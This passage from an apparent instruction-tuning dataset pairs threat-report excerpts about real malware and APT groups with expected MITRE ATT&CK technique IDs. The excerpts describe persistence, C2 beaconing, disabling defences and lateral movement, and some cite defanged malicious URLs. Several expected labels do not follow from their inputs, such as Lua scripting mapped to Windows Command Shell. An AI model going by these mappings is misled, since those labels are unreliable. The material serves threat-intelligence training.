observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A separate communication channel is created for each installed module. The communication protocol used is TLS over TCP. The communication is handled with the HP-Socket library. All the messages are RC4 encrypted using the hardcoded key. If the size of the message to be transferred is greater than or equal to 4KB, it is first compressed using zlib\u2019s Deflate implementation", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This component achieves persistence through the Run registry key and has full backdoor capabilities: it can download and execute binaries, run arbitrary commands or upload files from the victim computer to the C&C server", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The purpose of this malware is to perform destruction of the host, leave the computer system offline, and wipe remote data. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"\"Disabled: Specifies that the service should not be started\"", + "output": "- T1529: System Shutdown/Reboot" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"MechaFlounder begins by entering a loop that will continuously attempt to communicate with its C2 server. The Trojan will use HTTP to send an outbound beacon to its C2 server that contains the user's account name and hostname in the URL. The code, seen in Figure 2, builds the URL by concatenating the username and hostname with two dashes \"\"--\"\" between the two strings. The code then creates the URL string by using the username and hostname string twice with the back-slash \"\"\\\"\" character between the two and by appending the string \"\"-sample.html\"", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "EvilBunny is a multi-threaded bot with an integrated scripting engine. It incorporates a Lua engine and downloads and executes Lua scripts to reach a certain level of polymorphism. The Lua scripts can call back into the C++ code to alter the malware behavior at runtime", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Despite this indictment and other disclosures of COBALT DICKENS campaigns, the threat group (also known as Silent Librarian) shows no signs of stopping its activity as of this publication. CTU\u2122 researchers have observed the threat actors using free online services as part of their operations, including free certificates, domains, and publicly available tools", + "output": "- T1608.005: Stage Capabilities - Link Target" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This function keeps receiving data from the system clipboard and then determines if it is a valid bitcoin wallet address. If yes, it overwrites the wallet address with the attacker\u2019s", + "output": "- T1115: Clipboard Data\n- T1565.002: Data Manipulation - Transmitted Data Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After being extricated from the network, Dark Halo then returned a second time, exploiting a vulnerability in the organization's Microsoft Exchange Control Panel. Near the end of this incident, Volexity observed the threat actor using a novel technique to bypass Duo multi-factor authentication (MFA) to access the mailbox of a user via the organization's Outlook Web App (OWA) service. Finally, in a third incident, Dark Halo breached the organization by way of its SolarWinds Orion software in June and July 2020", + "output": "- T1190: Exploit Public-Facing Application" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. We assess with moderate confidence that these documents were sent to victims via phishing emails. One such trojanized document was created on April 23, 2019. The \"\"Blackwater.bas\"\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. Screenshot of the stager found in the document The stager then reached out to the actor-controlled C2 server located at hxxp://38[.]132[.]99[.]167/crf.txt. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. rCecms=BlackWater\"\". Notably, the trojanized document's macro was also called \"\"BlackWater,\"\" and the value \"\"BlackWater\"\" was hard coded into the PowerShell script\"", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If elevated privileges are not obtained, the malware falls back to using the same Windows registry run key as the older mode variant for persistence HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. For each service, the malware attempts to take control of the service\u2019s executable \u2014 first using icacls.exe with the /reset flag to reset the executable\u2019s permissions, then using takeown.exe with the /F flag to take ownership of the executable", + "output": "- T1222.001: File and Directory Permissions Modification - Windows File and Directory Permissions Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Microsoft discovered these new attacker tools and capabilities in some compromised customer networks and observed them to be in use from August to September 2020. Further analysis has revealed these may have been on compromised systems as early as June 2020", + "output": "- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ebury v1.4 has a fallback mechanism whereby a domain generation algorithm (DGA) is used when the attacker doesn\u2019t connect to the infected system via the OpenSSH backdoor for three days. Under these conditions, Ebury will exfiltrate the collected data using the generated domain. Ebury v1.6 has the same mechanism, but there is a minor change to the DGA itself", + "output": "- T1008: Fallback Channels\n- T1568.002: Dynamic Resolution - Domain Generation Algorithms" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 7: Dropbox-themed landing page with a lure asking users to click a button that links to the malicious document", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Central Command network, including computers both in the headquarters and in the combat zones.The threat involved into this incident is referred as Agent.btz. There is even a clash with another threat that is also detected as Agent.btz by another vendor \u2013 but that's a totally different threat with different functionality. All these builds exhibit common functionality.Agent.btz is a DLL file. Once a removable disk is connected to a computer infected with Agent.btz, the active malware will detect a newly recognized drive. It will drop its copy on it and it will create autorun.inf file with an instruction to run that file. Agent.btz file is not packed. Thus, it\u2019s not known what kind of code could have been injected into the browser process. Agent.btz locates this resource by looking for a marker 0xAA45F6F9 in its memory map.File wmcache.nldThe second spawned thread will wait for 10 seconds. The collected network details are also saved into the log file.File winview.ocxThe second spawned thread will log threat activity into the file %system32%\\winview.ocx.This file is also encrypted with the same XOR mask. Note: an attempt to run a valid thumb.db file, which is an OLE-type container has no effect.Files thumb.dd and mssysmgr.ocxAgent.btz is capable to create a binary file thumb.dd on a newly connected drive", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In cases where spam attachments could be verified \u2014 once a user has opened the attachment and enabled macro functionality \u2014 a PowerShell script downloads either Emotet, Bokbot or Trickbot, with the end payload being TrickBot", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "There are likely differences in the Skeleton Key malware documented by Dell SecureWorks and the Mimikatz skeleton key functionality. If all the DCs don\u2019t have skeleton key configured, the master password won\u2019t work when the client authenticates to a DC without skeleton key. Scenario: Either the attacker exploits MS14-068 or has the KRBTGT NTLM password hash and uses it to generate a Kerberos Golden Ticket to impersonate a valid Domain Admin account. Domain Controller Security Events When Implanting the Mimikatz Skeleton Key: When implanting the skeleton key remotely using Mimikatz the following events are logged on the Domain Controller. Authenticating with the Mimikatz Skeleton Key: Testing user password and user account with skeleton key password. Note that both passwords are accepted \u2013 the valid user password and the skeleton key master password. Testing Domain Admin account with password & skeleton key password. Note that both passwords are accepted \u2013 the valid user password and the skeleton key master password. Skeleton Key Mitigation: - Protect domain-level admin (DLA) accounts (Domain Admin, Administrators, etc) which reduces the risk of attackers gaining access to these credentials. Don\u2019t let DLA accounts logon to systems at a different security level from Domain Controllers", + "output": "- T1098: Account Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Updater.exe program has the same program icon as CelasTradePro.exe. When run, it checks for the CheckUpdate parameter, collects the victim\u2019s host information (System Owner/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR encryption, and sends information to a C2 website (Exfiltration Over C2 Channel [T1041", + "output": "- T1082: System Information Discovery\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Poseidon utilizes a variety of tools. Their main infection tool has been steadily evolving since 2005, with code remnants remaining the same to this day, while others have been altered to fit the requirements of new operating systems and specific campaigns. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As with other adversaries that mine cryptocurrency opportunistically, Blue Mockingbird likes to move laterally and distribute mining payloads across an enterprise", + "output": "- T1021.001: Remote Services - Remote Desktop Protocol\n- T1021.002: Remote Services - SMB/Windows Admin Shares\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In our analysis we could observe how the adversary ensures persistence by delivering an LNK file into the startup folder", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ESET researchers have dissected some of the latest additions to the malicious toolkit of the Advanced Persistent Threat (APT) group known as OceanLotus, also dubbed APT32 and APT-C-00", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Executes VBScript using Process.Start. The third-stage DLL proceeds by loading the \"\"AdvancedRun\"\" resource into memory, decompressing it and dropping it as \"\"AdvancedRun.exe\"\" into the %TEMP% directory. Drops AdvancedRun.exe using File.WriteAllBytes. AdvancedRun.exe\"\" is a tool provided by Nirsoft to execute a program with different settings. Once the tool is dropped, the third stage DLL will leverage it to execute two commands in the context of the Windows TrustedInstaller group. The TrustedInstaller group was an addition to Windows beginning in Windows 7 with the goal of preventing accidental damage to critical system files. AdvanceRun is one of the tools that can be used to execute commands in the context of the TrustedInstaller user. This functionality is only available via CLI and requires the flag of \"\"/RunAs 8\"\", which is shown in the commands below. The tool will be deleted from the %TEMP% directory after executing both commands. The first command leverages the Windows service control application (sc.exe) to disable Windows Defender\"", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1078.001: Valid Accounts - Default Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution. 29],[30(link is external)] - During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. 32(link is external)] Kimsuky also targets Microsoft Office users by formatting their documents in a .docx file rather than .hwp and will tailor their macros accordingly", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The QuietSieve malware family refers to a series of heavily-obfuscated .NET binaries specifically designed to steal information from the target host. If this check succeeds, a randomly-generated alphanumeric prefix is created and combined with the callback domain as a subdomain before an initial request is made over HTTPS", + "output": "- T1016.001: System Network Configuration Discovery - Internet Connection Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) \u2014 This simple downloader's code is similar to the main xxmm payload. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. Use the \u2018at' or \u2018schtask' commands to register a scheduled task to be executed in a few minutes. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. In particular, review network access for use of mobile USB modems on corporate systems", + "output": "- T1102.001: Web Service - Dead Drop Resolver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The decrypted result is saved as \u201c%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe\u201d (T1001) 6) If the file size of \u201c%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe\u201d exceeds 4,485 bytes, it is executed", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. If it is executed with the \"\"help\"\" parameter, it will install a service to execute itself as a service. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Document search module: Mssqldbserv.xml . This module has been described before in the article here. The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp\"", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "With domain administrator privileges obtained, the threat actors then moved laterally throughout the network using SMB and RDP to deploy Cobalt Strike beacons on the domain controllers around 1 hour after the initial execution of Bazar. On the domain controllers, some additional discovery was done using the PowerShell Active Directory module. After establishing Cobalt Strike beacons on those they felt ready to proceed to their final objectives", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. These new processes will first spawn a net.exe processing with the view argument to gather a list of network accessible hosts. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted", + "output": "- T1134.001: Access Token Manipulation - Token Impersonation/Theft\n- T1135: Network Share Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This hardens the encryption of the network communication, as a single RC4 key will not decrypt the entire payload. Leverages existing Windows registry key that is enabled by default in Windows 10 to store configuration data. Generates unique session keys for each connection to the C2 server. Employs polymorphic code, changing its runtime footprint during code execution to thwart memory analysis and evade signaturing. Encrypts or decrypts function blocks (code blocks) during runtime, as needed, to evade detection. Uses position independent code (PIC) to throw off static analysis tools", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Upon execution, MCMD spawns a console process (cmd.exe) with redirected standard input and output (I/O) handles. Immediately after execution, the window properties of both the MCMD and cmd.exe processes are modified to prevent them from being visible on the active user's desktop. MCMD utilizes the shared I/O handles to send and receive data between the C2 server and the command shell (see Figure 1", + "output": "- T1564.003: Hide Artifacts - Hidden Window\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) The malicious .rtf file exploits CVE-2017-11882. 3) The malware creates a child process, \u201cmshta.exe,\u201d which downloads a file from: hxxp://mumbai-m[.]site/b.txt. 4) b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally. For systems that have not had MS17-010 applied, the EternalBlue and EternalRomance exploits are leveraged to compromise systems. The exploit launched against the victim system depends on the operating system of the intended target", + "output": "- T1210: Exploitation of Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Commands received from the control server are encoded DWORDs - After decoding, these DWORDs should be in the range 123459h to 123490h", + "output": "- T1132.002: Data Encoding - Non-Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Turla has many names in the information security industry \u2014 it is also known as Snake, Venomous Bear, Uroburos and WhiteBear. Turla\u00a0likes to use compromised web servers and hijacked satellite connections for their command and control (C2) infrastructure. Instead, they use a compromised system inside the targeted network as a proxy, which forwards the traffic to the real C2 server. Well-known malware like Crutch or Kazuar are attributed to Turla. Lately, we have also seen research that has shown potential links between the Sunburst backdoor and Turla. Not every campaign run by Turla can clearly be attributed to them", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE 